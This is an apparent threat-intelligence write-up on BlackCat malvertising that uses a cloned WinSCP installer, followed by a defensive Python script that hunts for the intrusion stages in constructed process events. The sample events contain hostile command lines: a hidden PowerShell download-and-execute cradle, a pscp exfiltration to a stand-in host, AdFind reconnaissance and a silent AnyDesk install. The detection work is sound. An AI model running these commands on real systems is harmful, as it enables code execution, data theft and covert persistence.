The BlackCat ransomware-as-a-service group has been observed building a threat activity cluster that abuses search keywords associated with legitimate organizations' software, steering users toward cloned download pages that deliver malware.
Researchers from Trend Micro, working with an organization that has not been named, uncovered unauthorized activity by the attackers inside the company's network; the intrusion involved a cloned WinSCP download page and the SpyBoy tool.
The technique, known as malvertising, hijacks search keywords so that malicious ads appear alongside legitimate results and lure unsuspecting users into downloading malware. In this intrusion the attackers obtained top-level administrator privileges and attempted to establish backdoor access and persistence using remote management tools.
The researchers noted similarities between this campaign and earlier BlackCat operations, including the use of anti-antivirus and anti-EDR tooling such as SpyBoy to tamper with endpoint agent protection.
To exfiltrate the stolen data, the attackers used PSCP, the PuTTY Secure Copy client. Further investigation of the command-and-control domains used by the threat actor revealed a potential connection to the Clop ransomware operation.
The attack chain relied on SEO poisoning to deceive unsuspecting users into downloading a cloned application bundled with malware. The infection flow delivered an initial loader, which fetched the bot core, which in turn dropped the final payload, typically a backdoor. In this case the trojanized WinSCP installer carried a Cobalt Strike Beacon, giving the attackers remote control of the compromised host through their command-and-control server.
The researchers also identified the use of AdFind, a command-line tool that queries and displays information from Active Directory. In a threat actor's hands it serves as a reconnaissance tool: enumerating user accounts, groups, computers and domain trusts to map the environment and identify paths for privilege escalation and lateral movement.
The attackers also deployed the AnyDesk remote management tool within the environment to maintain persistence. The findings show the continuing effort by cybercriminals to trade on the reputation of legitimate software and organizations, and underscore the need for robust controls, including verifying installers against vendor-published hashes and signatures and watching for dual-use tools such as AdFind, PSCP and AnyDesk running from user-writable paths.
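The post-compromise toolset described in the paragraphs above (an installer spawning a shell, AdFind reconnaissance, PSCP exfiltration, AnyDesk installed for persistence) is a chain a SOC can hunt for in process-creation telemetry. The following is an added example written for this page, not code from Trend Micro or the report: the events are constructed to resemble Sysmon Event ID 1 records and are not real logs; the hostnames, usernames, paths, command lines and TEST-NET IP addresses are all invented. The rules flag each stage individually and then surface hosts where several stages co-occur, which is the signal that separates an intrusion from an admin running one dual-use tool.

```python
"""Hunt for the WinSCP-clone intrusion toolset in process-creation events.

Added example, not the report's or Trend Micro's code. All events below are
constructed (Sysmon Event ID 1 shape); no real telemetry, hosts or addresses.
"""
import re

# Live-off-the-land binaries an installer should not normally spawn.
SHELLS = {"powershell.exe", "cmd.exe", "rundll32.exe",
          "regsvr32.exe", "mshta.exe", "wscript.exe"}
INSTALLER_NAME = re.compile(r"setup|install", re.I)
# AdFind argument patterns typical of AD reconnaissance; these also catch a
# renamed adfind binary because they key on the command line, not the image.
ADFIND_ARGS = re.compile(r"-sc\s+trustdmp|objectcategory=|objectclass=|-gcb\s", re.I)
# scp-style remote target: user@host:path
SCP_TARGET = re.compile(r"\S+@\S+:")


def ev(host, user, parent, image, cmdline):
    """Build one constructed process-creation event (hypothetical data)."""
    return {"host": host, "user": user, "parent": parent,
            "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [
    ev("WS-017", r"CORP\jdoe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
       r"C:\Users\jdoe\Downloads\WinSCP-setup.exe", r'"C:\Users\jdoe\Downloads\WinSCP-setup.exe"'),
    ev("WS-017", r"CORP\jdoe", r"C:\Users\jdoe\Downloads\WinSCP-setup.exe",
       r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/a')\""),
    ev("WS-017", r"CORP\jdoe", r"C:\Windows\System32\cmd.exe",
       r"C:\Users\jdoe\AppData\Local\Temp\adfind.exe",
       'adfind.exe -f "(objectcategory=person)" -csv name sAMAccountName memberOf'),
    ev("WS-017", r"CORP\jdoe", r"C:\Windows\System32\cmd.exe",
       r"C:\Users\jdoe\AppData\Local\Temp\adfind.exe", "adfind.exe -sc trustdmp"),
    ev("WS-017", r"CORP\jdoe", r"C:\Windows\System32\cmd.exe",
       r"C:\Users\jdoe\AppData\Local\Temp\pscp.exe",
       r"pscp.exe -pw P@ss -r C:\Users\jdoe\AppData\Local\Temp\export\ root@203.0.113.45:/data/"),
    ev("WS-017", r"CORP\jdoe", r"C:\Windows\System32\cmd.exe",
       r"C:\Users\jdoe\Downloads\AnyDesk.exe",
       r'AnyDesk.exe --install "C:\ProgramData\AnyDesk" --start-with-win --silent'),
    # Benign: a user running a properly installed WinSCP from Explorer.
    ev("WS-022", r"CORP\asmith", r"C:\Windows\explorer.exe",
       r"C:\Program Files (x86)\WinSCP\WinSCP.exe", r'"C:\Program Files (x86)\WinSCP\WinSCP.exe"'),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_installer_spawns_shell(e):
    """A *setup*/*install* binary launching a scripting host or LOLBin."""
    return bool(INSTALLER_NAME.search(basename(e["parent"]))) and basename(e["image"]) in SHELLS


def rule_adfind_recon(e):
    return basename(e["image"]) == "adfind.exe" or bool(ADFIND_ARGS.search(e["cmdline"]))


def rule_pscp_exfil(e):
    return basename(e["image"]) in {"pscp.exe", "psftp.exe"} and bool(SCP_TARGET.search(e["cmdline"]))


def rule_anydesk_silent_install(e):
    c = e["cmdline"].lower()
    return (basename(e["image"]) == "anydesk.exe" and "--install" in c
            and ("--silent" in c or "--start-with-win" in c))


RULES = [
    ("installer_spawns_shell", "execution", rule_installer_spawns_shell),
    ("adfind_recon", "discovery", rule_adfind_recon),
    ("pscp_exfil", "exfiltration", rule_pscp_exfil),
    ("anydesk_silent_install", "persistence", rule_anydesk_silent_install),
]


def scan(events):
    """Return one finding per (event, rule) match, in event order."""
    findings = []
    for e in events:
        for name, tactic, pred in RULES:
            if pred(e):
                findings.append({"rule": name, "tactic": tactic, "host": e["host"],
                                 "user": e["user"], "image": e["image"]})
    return findings


def chained_hosts(findings, min_stages=3):
    """Hosts on which at least min_stages distinct tactics fired."""
    stages = {}
    for f in findings:
        stages.setdefault(f["host"], set()).add(f["tactic"])
    return sorted(h for h, s in stages.items() if len(s) >= min_stages)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:<8}{f['tactic']:<13}{f['rule']:<24}{f['image']}")
    print("hosts showing a multi-stage chain:", chained_hosts(hits))
```

Each rule on its own is noisy in a real estate (administrators do run AdFind and AnyDesk), which is why the final step groups findings per host by tactic; a single workstation producing execution, discovery, exfiltration and persistence hits within one session is worth an immediate look regardless of how any one rule is tuned.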